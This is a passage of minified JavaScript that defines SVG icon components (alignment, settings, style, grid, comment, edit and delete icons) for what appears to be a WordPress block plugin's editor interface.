7v1.5h16v-1.5H4z"})),r.center=(0,a.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.4 4.2H7.6v1.5h8.9V4.2zM4 11.2v1.5h16v-1.5H4zm3.6 8.6h8.9v-1.5H7.6v1.5z"})),r.right=(0,a.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.1 19.8H20v-1.5h-8.9v1.5zm0-15.6v1.5H20V4.2h-8.9zM4 12.8h16v-1.5H4v1.5z"})),r.spacing=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:24,height:24,fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"#1E1E1E",strokeWidth:"1.5",d:"m10 8-3.3 3.3a1 1 0 0 0 0 1.4L10 16m4-8 3.3 3.3a1 1 0 0 1 0 1.4L14 16m-7.59-4H17.6M20 4v16M4 4v16"})),r.updateLink=(0,a.createElement)("svg",{style:{height:"20px",width:"20px"},xmlns:"http://www.w3.org/2000/svg",width:"20",height:"20",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fill:"#070707",fillRule:"evenodd",d:"M12.95 2.93a5.75 5.75 0 0 1 8.13 8.13v.01l-3 3a5.75 5.75 0 0 1-8.68-.62.75.75 0 0 1 1.2-.9 4.25 4.25 0 0 0 6.41.46l3-3a4.25 4.25 0 0 0-6.02-6l-1.71 1.7a.75.75 0 1 1-1.06-1.06l1.73-1.72Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fill:"#070707",fillRule:"evenodd",d:"M7.99 8.6a5.75 5.75 0 0 1 6.61 1.95.75.75 0 1 1-1.2.9 4.25 4.25 0 0 0-6.41-.46l-3 3a4.25 4.25 0 0 0 6.01 6l1.71-1.7a.75.75 0 0 1 1.06 1.06l-1.72 1.72a5.75 5.75 0 0 1-8.13-8.13l.01-.01 3-3a5.75 5.75 0 0 1 2.06-1.32Z",clipRule:"evenodd"})),r.addSubmenu=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"16",height:"16",fill:"none",viewBox:"0 0 16 16"},(0,a.createElement)("g",{fill:"#070707",fillRule:"evenodd",clipPath:"url(#a)",clipRule:"evenodd"},(0,a.createElement)("path",{d:"M.17 2C.17.99.99.17 2 .17h12c1.01 0 1.83.82 1.83 1.83v1.33c0 1.02-.82 1.84-1.83 1.84H2A1.83 1.83 0 0 1 .17 3.33V2ZM2 1.17a.83.83 0 0 0-.83.83v1.33c0 .46.37.84.83.84h12c.46 0 .83-.38.83-.84V2a.83.83 0 0 0-.83-.83H2ZM5.5 8c0-1.01.82-1.83 1.83-1.83h5.34c1 0 1.83.82 1.83 1.83v.67c0 1-.82 1.83-1.83 1.83H7.33A1.83 1.83 0 0 1 5.5 8.67V8Zm1.83-.83A.83.83 0 0 0 6.5 8v.67c0 .46.37.83.83.83h5.34c.46 0 .83-.37.83-.83V8a.83.83 0 0 0-.83-.83H7.33ZM5.5 13.33c0-1.01.82-1.83 1.83-1.83h5.34c1 0 1.83.82 1.83 1.83V14c0 1.01-.82 1.83-1.83 1.83H7.33A1.83 1.83 0 0 1 5.5 14v-.67Zm1.83-.83a.83.83 0 0 0-.83.83V14c0 .46.37.83.83.83h5.34c.46 0 .83-.37.83-.83v-.67a.83.83 0 0 0-.83-.83H7.33Z"}),(0,a.createElement)("path",{d:"M2.17 13V4.67h1V13c0 .1.07.17.16.17H6.5v1H3.33c-.64 0-1.16-.53-1.16-1.17Z"}),(0,a.createElement)("path",{d:"M2.17 7.83H6.5v1H2.17v-1Z"})),(0,a.createElement)("defs",null,(0,a.createElement)("clipPath",{id:"a"},(0,a.createElement)("path",{fill:"#fff",d:"M0 0h16v16H0z"})))),r.textTab=(0,a.createElement)("span",{className:"ultp-tab-button"},(0,a.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 18V6C4 4.89543 4.89543 4 6 4H14.8639C15.3943 4 15.903 4.21071 16.2781 4.58579L19.4142 7.72191C19.7893 8.09698 20 8.60569 20 9.13612V18C20 19.1046 19.1046 20 18 20H6C4.89543 20 4 19.1046 4 18Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M8 15H16",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M8 12H16",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M8 9H14",stroke:"#1E1E1E",strokeWidth:"1.5"})),(0,a.createElement)("span",null,"Text")),r.style=(0,a.createElement)("span",{className:"ultp-tab-button"},(0,a.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M19.9753 10C20.1346 11.5 19.6219 12.5 18.6219 13.5C16.6219 15.5 12.5451 14.2091 11.73 15C10.9148 15.791 11.73 16.8594 12.7008 17.4873C14.2468 18.4873 13.7314 19.9873 12.2453 20.0001C7.69166 20.0391 4 16 4 12C4 7.58197 7.69149 4 12.2453 4C16.7991 4 19.7128 7.52818 19.9753 10Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("circle",{cx:"16.25",cy:"9.25",r:"1.25",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M14 7C14 7.69036 13.4404 8.25 12.75 8.25C12.0596 8.25 11.5 7.69036 11.5 7C11.5 6.30964 12.0596 5.75 12.75 5.75C13.4404 5.75 14 6.30964 14 7Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M10 8.25C10 8.94036 9.44036 9.5 8.75 9.5C8.05964 9.5 7.5 8.94036 7.5 8.25C7.5 7.55964 8.05964 7 8.75 7C9.44036 7 10 7.55964 10 8.25Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M8.5 12C8.5 12.6904 7.94036 13.25 7.25 13.25C6.55964 13.25 6 12.6904 6 12C6 11.3096 6.55964 10.75 7.25 10.75C7.94036 10.75 8.5 11.3096 8.5 12Z",fill:"#1E1E1E"})),(0,a.createElement)("span",null,"Style")),r.settings3=(0,a.createElement)("span",{className:"ultp-tab-button"},(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M20.0733 7.98829L19.5027 6.9982C19.02 6.16044 17.9503 5.87144 17.1114 6.35213C16.7121 6.58737 16.2356 6.65411 15.787 6.53764C15.3384 6.42116 14.9546 6.13103 14.7201 5.73123C14.5693 5.47711 14.4882 5.18767 14.4852 4.89218C14.4988 4.41843 14.3201 3.95934 13.9897 3.61951C13.6593 3.27967 13.2055 3.08802 12.7316 3.08821H11.5821C11.1177 3.08821 10.6725 3.27323 10.345 3.60234C10.0175 3.93145 9.83459 4.37752 9.83682 4.84183C9.82306 5.80049 9.04195 6.57039 8.08319 6.57029C7.7877 6.56722 7.49826 6.48617 7.24414 6.33535C6.40523 5.85465 5.33553 6.14366 4.85284 6.98142L4.24033 7.98829C3.75822 8.825 4.04329 9.89403 4.87801 10.3796C5.42059 10.6928 5.75483 11.2718 5.75483 11.8983C5.75483 12.5248 5.42059 13.1037 4.87801 13.417C4.04435 13.8993 3.75897 14.9657 4.24033 15.7999L4.81927 16.7984C5.04543 17.2064 5.42489 17.5076 5.87369 17.6351C6.32248 17.7627 6.8036 17.7061 7.21058 17.478C7.61067 17.2445 8.08743 17.1806 8.5349 17.3003C8.98238 17.4201 9.36347 17.7136 9.59349 18.1157C9.74431 18.3698 9.82536 18.6592 9.82843 18.9547C9.82843 19.9232 10.6136 20.7083 11.5821 20.7083H12.7316C13.6968 20.7083 14.4806 19.9283 14.4852 18.9631C14.4829 18.4973 14.667 18.05 14.9963 17.7206C15.3257 17.3913 15.773 17.2073 16.2388 17.2095C16.5336 17.2174 16.8218 17.2981 17.0779 17.4444C17.9146 17.9265 18.9836 17.6415 19.4692 16.8067L20.0733 15.7999C20.3071 15.3985 20.3713 14.9205 20.2516 14.4717C20.1319 14.0228 19.8382 13.6402 19.4356 13.4086C19.033 13.1769 18.7393 12.7943 18.6196 12.3455C18.4999 11.8967 18.5641 11.4186 18.7979 11.0173C18.95 10.7518 19.1701 10.5317 19.4356 10.3796C20.2653 9.89429 20.5497 8.83151 20.0733 7.99668V7.98829Z",stroke:"#1E1E1E",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12.1606 14.3147C13.4952 14.3147 14.5771 13.2329 14.5771 11.8983C14.5771 10.5637 13.4952 9.4818 12.1606 9.4818C10.826 9.4818 9.74414 10.5637 9.74414 11.8983C9.74414 13.2329 10.826 14.3147 12.1606 14.3147Z",stroke:"#1E1E1E",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),(0,a.createElement)("span",null,"Settings")),r.add=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:22,height:24,viewBox:"0 0 22 24",fill:"none"},(0,a.createElement)("g",{clipPath:"url(#clip0_16_9344)"},(0,a.createElement)("path",{d:"M15.7131 0.87241C16.6876 0.87241 17.4896 1.67503 17.4896 2.66957V17.6401C17.4896 18.626 16.6962 19.4373 15.7131 19.4373H2.63896C1.66445 19.4373 0.862407 18.6347 0.862407 17.6401V2.66957C0.862407 1.68375 1.65582 0.87241 2.63896 0.87241H15.7131ZM15.7131 0H2.63896C1.1815 0 0 1.1952 0 2.66957V17.6401C0 19.1145 1.1815 20.3097 2.63896 20.3097H15.7131C17.1705 20.3097 18.352 19.1145 18.352 17.6401V2.66957C18.352 1.1952 17.1705 0 15.7131 0Z",fill:"black"}),(0,a.createElement)("path",{d:"M19.2921 10.2683H11.1337C9.63817 10.2683 8.42578 11.4948 8.42578 13.0077V21.2607C8.42578 22.7736 9.63817 24 11.1337 24H19.2921C20.7877 24 22.0001 22.7736 22.0001 21.2607V13.0077C22.0001 11.4948 20.7877 10.2683 19.2921 10.2683Z",fill:"black"}),(0,a.createElement)("path",{d:"M15.7047 13.9934H14.7129V20.2835H15.7047V13.9934Z",fill:"white"}),(0,a.createElement)("path",{d:"M18.3264 16.6282H12.1084V17.6314H18.3264V16.6282Z",fill:"white"})),(0,a.createElement)("defs",null,(0,a.createElement)("clipPath",{id:"clip0_16_9344"},(0,a.createElement)("rect",{width:22,height:24,fill:"white"})))),r.setting=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",role:"img","aria-hidden":"true",focusable:"false"},(0,a.createElement)("path",{d:"M14.5 13.8c-1.1 0-2.1.7-2.4 1.8H4V17h8.1c.3 1 1.3 1.8 2.4 1.8s2.1-.7 2.4-1.8H20v-1.5h-3.1c-.3-1-1.3-1.7-2.4-1.7zM11.9 7c-.3-1-1.3-1.8-2.4-1.8S7.4 6 7.1 7H4v1.5h3.1c.3 1 1.3 1.8 2.4 1.8s2.1-.7 2.4-1.8H20V7h-8.1z"})),r.styleIcon=(0,a.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg",style:{fill:"white"}},(0,a.createElement)("path",{d:"M19.9753 10C20.1346 11.5 19.6219 12.5 18.6219 13.5C16.6219 15.5 12.5451 14.2091 11.73 15C10.9148 15.791 11.73 16.8594 12.7008 17.4873C14.2468 18.4873 13.7314 19.9873 12.2453 20.0001C7.69166 20.0391 4 16 4 12C4 7.58197 7.69149 4 12.2453 4C16.7991 4 19.7128 7.52818 19.9753 10Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("circle",{cx:"16.25",cy:"9.25",r:"1.25",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M14 7C14 7.69036 13.4404 8.25 12.75 8.25C12.0596 8.25 11.5 7.69036 11.5 7C11.5 6.30964 12.0596 5.75 12.75 5.75C13.4404 5.75 14 6.30964 14 7Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M10 8.25C10 8.94036 9.44036 9.5 8.75 9.5C8.05964 9.5 7.5 8.94036 7.5 8.25C7.5 7.55964 8.05964 7 8.75 7C9.44036 7 10 7.55964 10 8.25Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M8.5 12C8.5 12.6904 7.94036 13.25 7.25 13.25C6.55964 13.25 6 12.6904 6 12C6 11.3096 6.55964 10.75 7.25 10.75C7.94036 10.75 8.5 11.3096 8.5 12Z",fill:"#1E1E1E"})),r.chatgpt=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",style:{fill:"#10a37f"},width:"25",height:"25.06",viewBox:"0 0 25 25.06"},(0,a.createElement)("path",{"data-name":"Path 146",d:"M24.795 12.941a6.153 6.153 0 0 0-1.519-2.7A6.07 6.07 0 0 0 22.8 5.1a6.327 6.327 0 0 0-6.88-2.917A6.28 6.28 0 0 0 5.139 4.471 6.223 6.223 0 0 0 .846 7.45a6.137 6.137 0 0 0 .862 7.358 6.07 6.07 0 0 0 .479 5.138 6.281 6.281 0 0 0 6.88 2.91A6.278 6.278 0 0 0 19.851 20.6a6.23 6.23 0 0 0 4.293-2.979 6.092 6.092 0 0 0 .651-4.682m-4.888 5.947v-6.22a.639.639 0 0 0-.285-.621L13.913 8.82l2.061-1.17L20.8 10.4a4.636 4.636 0 0 1 2.209 2.854 4.566 4.566 0 0 1-.475 3.517 4.662 4.662 0 0 1-2.185 1.943c-.146.063-.3.122-.446.178M5.083 6.178v6.2a.624.624 0 0 0 .279.622l5.708 3.226L9.011 17.4l-4.852-2.752a4.639 4.639 0 0 1-2.21-2.854 4.562 4.562 0 0 1 .473-3.514 4.687 4.687 0 0 1 1.784-1.736 4.551 4.551 0 0 1 .877-.367m11.268.023a.714.714 0 0 0-.707 0L9.855 9.5V7.1l4.92-2.748a4.79 4.79 0 0 1 6.485 1.721 4.574 4.574 0 0 1 .616 2.648c-.014.19-.039.393-.07.58zm-3.859 3.47 2.637 1.5v2.756l-2.637 1.457-2.631-1.5v-2.741zM8.8 6.067a.684.684 0 0 0-.3.624v6.4l-2.082-1.137V6.587a1.017 1.017 0 0 0 0-.112 4.75 4.75 0 0 1 7.364-3.911 6.33 6.33 0 0 1 .547.412zm-5.614 9.692 5.448 3.1a.713.713 0 0 0 .707 0l5.8-3.294v2.4l-4.927 2.729a4.79 4.79 0 0 1-6.485-1.713 4.573 4.573 0 0 1-.588-2.917c.013-.1.031-.2.05-.3m13 3.226a.647.647 0 0 0 .3-.627v-6.4l2.07 1.137v5.367a.637.637 0 0 0 0 .112 4.75 4.75 0 0 1-7.441 3.851 7.315 7.315 0 0 1-.467-.356z",transform:"translate(0 .001)"})),r.fs_comment=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"50",height:"50.003",viewBox:"0 0 50 50.003"},(0,a.createElement)("path",{id:"Path_2150","data-name":"Path 2150",d:"M25,11.6c-21.64,0-25,2.79-25,20.8C0,46.131,1.963,51.017,12.476,52.567V61.6l10.646-8.4c.611.005,1.235.008,1.878.008,21.65,0,25-2.8,25-20.81S46.65,11.6,25,11.6m0,18.04a2.765,2.765,0,1,1-2.76,2.76A2.768,2.768,0,0,1,25,29.642m-9.53,0a2.765,2.765,0,1,1-2.76,2.76,2.768,2.768,0,0,1,2.76-2.76m19.06,5.53A2.765,2.765,0,1,1,37.3,32.4a2.768,2.768,0,0,1-2.77,2.77",transform:"translate(0 -11.602)",fill:"#037FFF"})),r.fs_comment_selected=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"70",height:"70",viewBox:"0 0 70 70"},(0,a.createElement)("g",{id:"Group_4357","data-name":"Group 4357",transform:"translate(-221.11 2002)"},(0,a.createElement)("path",{id:"Path_2154","data-name":"Path 2154",d:"M172.35,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2155","data-name":"Path 2155",d:"M181.88,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2156","data-name":"Path 2156",d:"M191.41,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2157","data-name":"Path 2157",d:"M204.65,0H153.58a9.468,9.468,0,0,0-9.47,9.46V60.54A9.468,9.468,0,0,0,153.58,70h51.07a9.46,9.46,0,0,0,9.46-9.46V9.46A9.46,9.46,0,0,0,204.65,0M179.11,51.61c-.64,0-1.26,0-1.87-.01L166.59,60V50.96c-10.51-1.55-12.48-6.43-12.48-20.16,0-18.01,3.36-20.8,25-20.8s25,2.79,25,20.8-3.35,20.81-25,20.81",transform:"translate(77 -2002)",fill:"#037FFF"}))),r.fs_suggestion=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"50.001",height:"49.997",viewBox:"0 0 50.001 49.997"},(0,a.createElement)("g",{id:"Group_4358","data-name":"Group 4358",transform:"translate(-137.503 1994.592)"},(0,a.createElement)("path",{id:"Path_2151","data-name":"Path 2151",d:"M104.722,20.306H89.545V24.08a4.274,4.274,0,0,1-4.267,4.267H76.261a4.218,4.218,0,0,1-1.812-.424,4.272,4.272,0,0,1-4.107,3.166h-6.1V51.623A5.773,5.773,0,0,0,70.021,57.4h34.7a5.78,5.78,0,0,0,5.782-5.782V26.1a5.789,5.789,0,0,0-5.782-5.793M90.13,47.791H76.835a1.692,1.692,0,0,1,0-3.384H90.13a1.692,1.692,0,0,1,0,3.384m7.778-7.915H76.835a1.692,1.692,0,0,1,0-3.384H97.908a1.692,1.692,0,0,1,0,3.384",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2152","data-name":"Path 2152",d:"M86.1,24.077V15.065a.827.827,0,0,0-.827-.827H80.619a.827.827,0,0,1-.742-1.193l2.2-4.443a.827.827,0,0,0-.741-1.194h-2a.827.827,0,0,0-.741.461l-3.062,6.2a.83.83,0,0,0-.086.366v9.646a.827.827,0,0,0,.827.827h9.012a.827.827,0,0,0,.827-.827",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2153","data-name":"Path 2153",d:"M71.169,26.82V17.808a.827.827,0,0,0-.827-.827H65.684a.827.827,0,0,1-.742-1.193l2.2-4.443a.827.827,0,0,0-.741-1.194H64.392a.827.827,0,0,0-.741.461l-3.062,6.2a.83.83,0,0,0-.086.366V26.82a.827.827,0,0,0,.827.827h9.012a.827.827,0,0,0,.827-.827",transform:"translate(77 -2002)",fill:"#037FFF"}))),r.fs_suggestion_selected=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"70",height:"70",viewBox:"0 0 70 70"},(0,a.createElement)("path",{id:"Path_2158","data-name":"Path 2158",d:"M329.38,0H278.3a9.46,9.46,0,0,0-9.46,9.46V60.54A9.46,9.46,0,0,0,278.3,70h51.08a9.466,9.466,0,0,0,9.46-9.46V9.46A9.466,9.466,0,0,0,329.38,0M293.77,17.03a.779.779,0,0,1,.09-.37l3.06-6.2a.834.834,0,0,1,.74-.46h2.01a.833.833,0,0,1,.74,1.2l-2.2,4.44a.825.825,0,0,0,.74,1.19h4.66a.828.828,0,0,1,.83.83v9.01a.828.828,0,0,1-.83.83H294.6a.828.828,0,0,1-.83-.83ZM278.84,29.41V19.77a.946.946,0,0,1,.08-.37l3.06-6.19a.82.82,0,0,1,.75-.46h2a.825.825,0,0,1,.74,1.19l-2.19,4.44a.826.826,0,0,0,.74,1.2h4.66a.824.824,0,0,1,.82.82v9.01a.826.826,0,0,1-.82.83h-9.02a.826.826,0,0,1-.82-.83m50,24.81A5.783,5.783,0,0,1,323.06,60H288.35a5.77,5.77,0,0,1-5.78-5.78V33.68h6.11a4.26,4.26,0,0,0,4.1-3.16,4.257,4.257,0,0,0,1.81.42h9.02a4.274,4.274,0,0,0,4.27-4.27V22.9h15.18a5.791,5.791,0,0,1,5.78,5.79Zm-12.6-15.13H295.17a1.69,1.69,0,1,0,0,3.38h21.07a1.69,1.69,0,1,0,0-3.38M308.46,47H295.17a1.7,1.7,0,0,0,0,3.39h13.29a1.7,1.7,0,0,0,0-3.39",transform:"translate(-268.84)",fill:"#037FFF"})),r.grid_col1=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22",fill:"currentColor"},(0,a.createElement)("g",{transform:"translate(-770 -381)"},(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(770 381)"}),(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(770 393)"}),(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(782 381)"}),(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(782 393)"}))),r.grid_col2=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22",fill:"currentColor"},(0,a.createElement)("g",{transform:"translate(-858 -381)"},(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(858 381)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(858 389)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(858 397)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(866 381)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(866 389)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(866 397)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(874 381)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(874 389)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(874 397)"}))),r.grid_col3=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22"},(0,a.createElement)("g",{transform:"translate(-909 -381)"},(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 399)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 399)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 399)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 399)"}))),r.rocketPro=(0,a.createElement)("svg",{width:"16",height:"16",viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M10.7991 7.20004C9.69681 7.20004 8.7993 6.30253 8.7993 5.20024C8.7993 4.09795 9.69681 3.20044 10.7991 3.20044C11.9014 3.20044 12.7989 4.09795 12.7989 5.20024C12.7989 6.30253 11.9014 7.20004 10.7991 7.20004ZM10.7991 4.00036C10.1376 4.00036 9.59922 4.53871 9.59922 5.20024C9.59922 5.86177 10.1376 6.40012 10.7991 6.40012C11.4606 6.40012 11.999 5.86177 11.999 5.20024C11.999 4.53871 11.4606 4.00036 10.7991 4.00036ZM0.400132 15.9992C0.335857 15.9993 0.272494 15.984 0.215433 15.9544C0.158371 15.9248 0.109297 15.8819 0.0723848 15.8292C0.0354726 15.7766 0.0118133 15.7159 0.00341887 15.6521C-0.00497556 15.5884 0.00214312 15.5236 0.0241696 15.4632C1.25525 12.0788 2.54952 10.3621 3.87019 10.3621C4.30615 10.3621 4.7133 10.5493 5.08207 10.9173C5.66441 11.4996 5.68521 12.0796 5.60042 12.4635C5.33324 13.6698 3.62941 14.8513 0.536919 15.976C0.49303 15.9917 0.446764 15.9998 0.400132 16V15.9992ZM3.87099 11.1612C3.47503 11.1612 3.00867 11.5084 2.52312 12.1651C2.04557 12.8107 1.56562 13.7306 1.09286 14.9065C2.16076 14.4769 3.01907 14.041 3.65181 13.6066C4.50533 13.0203 4.7581 12.5667 4.81969 12.2899C4.88129 12.0132 4.7821 11.7484 4.51652 11.4828C4.30055 11.2668 4.08937 11.162 3.87019 11.162L3.87099 11.1612Z",fill:"white"}),(0,a.createElement)("path",{d:"M15.5986 0.00079992C13.5228 0.00079992 11.6734 0.352765 10.1 1.0471C8.80329 1.61984 7.693 2.42296 6.79949 3.43566C6.63311 3.62444 6.47872 3.81562 6.33554 4.0076C5.64601 4.05319 4.94048 4.32757 4.23655 4.82352C3.64061 5.24268 3.04227 5.82342 2.45673 6.54894C1.47282 7.76802 0.868084 8.9703 0.842486 9.0207C0.800011 9.10558 0.789106 9.2028 0.81172 9.29498C0.834335 9.38716 0.888995 9.4683 0.96593 9.52388C1.04287 9.57947 1.13706 9.60588 1.23168 9.5984C1.3263 9.59092 1.41518 9.55003 1.48242 9.48305C1.48642 9.47905 1.86878 9.10309 2.52072 8.73433C3.05826 8.43036 3.88698 8.07279 4.88928 8.0096C5.14286 8.65833 5.86838 9.43426 6.21635 9.78222C6.56431 10.1302 7.34024 10.8557 7.98897 11.1093C7.92578 12.1116 7.56821 12.9403 7.26425 13.4779C6.89468 14.1306 6.51952 14.5121 6.51632 14.5153C6.45032 14.5828 6.41026 14.6714 6.40318 14.7655C6.3961 14.8596 6.42247 14.9532 6.47763 15.0298C6.5328 15.1064 6.61322 15.1611 6.70473 15.1842C6.79625 15.2073 6.89297 15.1973 6.97787 15.1561C7.02827 15.1305 8.23055 14.5257 9.44963 13.5418C10.1752 12.9563 10.7559 12.358 11.1751 11.762C11.671 11.0573 11.9446 10.3526 11.991 9.66303C12.1822 9.52065 12.3733 9.36626 12.5629 9.19908C13.5756 8.30557 14.3787 7.19528 14.9515 5.89861C15.6458 4.32597 15.9978 2.47575 15.9978 0.39996V0H15.5978L15.5986 0.00079992ZM2.48552 7.84641C3.24785 6.74013 4.41333 5.36826 5.7268 4.93711C5.20765 5.84661 4.93888 6.68173 4.84209 7.21128C4.02236 7.26546 3.22145 7.48132 2.48552 7.84641ZM8.15376 13.5114C8.51883 12.7761 8.73444 11.9757 8.78809 11.1565C9.31684 11.0597 10.1528 10.7909 11.0615 10.2726C10.6295 11.5836 9.25845 12.7491 8.15296 13.5114H8.15376ZM12.0342 8.59994C10.3703 10.0678 8.64731 10.3998 8.39933 10.3998C8.39773 10.3998 8.23375 10.3966 7.79219 10.0854C7.48422 9.86861 7.12506 9.55984 6.78269 9.21748C6.44033 8.87511 6.13156 8.51595 5.91478 8.20798C5.60361 7.76642 5.60041 7.60244 5.60041 7.60084C5.60041 7.35286 5.93238 5.62984 7.40023 3.966C9.15686 1.9758 11.8454 0.887111 15.1947 0.806319C15.1139 4.15558 14.026 6.84411 12.035 8.60074L12.0342 8.59994Z",fill:"white"})),r.subtract=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.rightMark=(0,a.createElement)("svg",{width:"14",height:"11",viewBox:"0 0 14 11",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M1 5L5 9L13 1",stroke:"#5ECA70",strokeWidth:"1.5"})),r.plus=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),r.delete=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M18.2 6.5H16c-.4 0-.8-.3-1-.7l-.3-1c-.1-.4-.5-.7-1-.7h-3.5c-.4 0-.8.3-1 .7l-.2 1c-.1.4-.5.7-1 .7H5.8c-.5 0-.8.3-.8.7s.3.8.8.8h12.5c.4 0 .7-.3.7-.8s-.3-.7-.8-.7zM12.5 16.5c0 .3-.2.5-.5.5s-.5-.2-.5-.5V9H6l1.3 9.3c.1 1 1 1.7 2 1.7h5.5c1 0 1.8-.7 2-1.7L18 9h-5.5v7.5z"})),r.edit=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M19.3 18.1h-5.9c-.4 0-.8.3-.8.8s.3.8.8.8h5.9c.4 0 .8-.3.8-.8s-.4-.8-.8-.8zM16.2 11c1.5-1.9 1.5-2 1.6-2 